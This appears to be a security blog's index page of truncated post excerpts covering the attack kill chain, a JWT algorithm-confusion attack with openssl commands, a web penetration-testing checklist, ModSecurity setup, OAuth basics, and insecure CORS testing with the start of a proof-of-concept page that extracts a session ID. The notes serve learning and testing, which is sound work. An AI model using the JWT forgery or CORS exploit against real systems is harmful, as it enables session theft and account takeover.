Cyber Noobie

kill chain: Reconnaissance Intrusion Exploitation Privilege Escalation Lateral Movement Obfuscation / Anti-forensics Denial of Service Exfiltration Reconnaissance The observation stage: attackers typically assess the situation from the outside-in, in order to identify both targets and tactics for the attack. Intrusion Based on what the attackers discovered in the reconnaissance phase, they’re able to get into your systems: often leveraging malware or security vulnerabilities. Exploitation The act of exploiting vulnerabilities, and delivering malicious code onto the system, in order to get a better foothold. Privilege Escalation Attackers often need more privileges on a system to get access to more data and permissions: for this, they need to escalate their privileges often to an Admin. Lateral Movement Once they’re in the system, attackers can move laterally to other systems and accounts in order to gain more leverage: whether that’s higher permissio...

API PT JWT Attack: Capturing RSA Public key and create a new token: attack method: Step 1: capture the jwt token. step 2: change the alogrithm to rs256 to hs256 change the desire parameter. step 3: convert this back to the JWT format. step 4: Adding signature to the JWT        How to get the server certification:             cmd:openssl s_client -connect <hostname>:443        Getting public key from the certification:             cmd:openssl x509 -pubkey -noout -in cert.pem > key.pem        

Test handling of input Fuzz all request parameters Test for SQL injection Identify all reflected data Test for reflected XSS Test for HTTP header injection Test for arbitrary redirection Test for stored attacks Test for OS command injection Test for path traversal Test for script injection Test for file inclusion Test for SMTP injection Test for native software flaws (buffer overflow, integer bugs, format strings) Test for SOAP injection Test for LDAP injection Test for XPath injection [v] Http parameters pollution [v] Host header injection [ ] Xxe [v] Xss 1. Reflected 2. Stored 3. Blind [ ] Csrf 1. Get method 2. Post method 3. Token  [ ] Sqli 1. In band sqli 2. Inferential  3. Out of band [v] IDOR [v] Os & cmd injection [v] Crlf injection [ ] Xpath injection [ ] Ssrf [ ] Session hijacking [ ] Session fixation  [v] Html injection [ ] Open redirection [ ] Parameter ...

Installing modsecurity and CRS in Local: Step 1: Installing Apache Web server First, you need to install Apache if it is not installed on your Ubuntu 18.04 server.  First update the Ubuntu package index. $ sudo apt-get update Then, install Apache: $ sudo apt-get install Apache2 Press Y and hit Enter when prompted to confirm the installation If Apache is already installed, you should get the error message below: apache2 is already the newest version Step 2: Installing ModSecurity Once you have installed Apache, the next step is installing ModSecurity. Run the command below: $ sudo apt-get install libapache2-mod-security2 Restart Apache $ sudo service apache2 restart You can check if the module is enabled by running the command below: $ sudo apachectl -M | grep security You should get the below output: security2_module (shared) Step 3: Configuring ModSecurity ModSecurity engine needs rules to work. The rules decide how communication is...

Insecure CORS: CORS misconfiguration: Insecure CORS: url querystring = embed? way to find insecure cors misconfiguration: 1.origin: www.evil.com in request header ->check if in response header ->it returns all-origin-control:www.evil.com then there is a insecure cors. 2.Curl http://example.com -H"Origin:atacking URL" -I Exploit: Access-control-Allow-Origin:null Access-Control-Allow-Crenditals:true Poorly impletmented and not expoiltable. Access-control-Allow-Origin:* PAYLOAD: <!DOCTYPE html> <html> <body> <center> <h2>CORS POC Exploit</h2> <h3>Extract SID</h3> <div id=&quot;demo&quot;> <button type=&quot;button&quot; onclick=&quot;cors()&quot;>Exploit</button> </div> <script> function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 &amp;&amp...

What is OAuth? OAuth 2.0 is a protocol that allows a user to grant limited access to their resources on one site, to another site, without having to expose their credentials. EX: Many luxury cars today come with a valet key. It is a special key you give the parking attendant and unlike your regular key, will not allow the car to drive more than a mile or two. Some valet keys will not open the trunk, while others will block access to your onboard cell phone address book. Regardless of what restrictions the valet key imposes, the idea is very clever. You give someone limited access to your car with a special key, while using your regular key to unlock everything. To get access to the protected resources OAuth 2.0 uses Access Tokens .  An Access Token is a string representing the granted permissions. Access Token Format Auth0 generates Access Tokens, for API Authorization scenarios , in JSON Web Token (JWT) format. JWTs contain three parts: a header, a payload, an...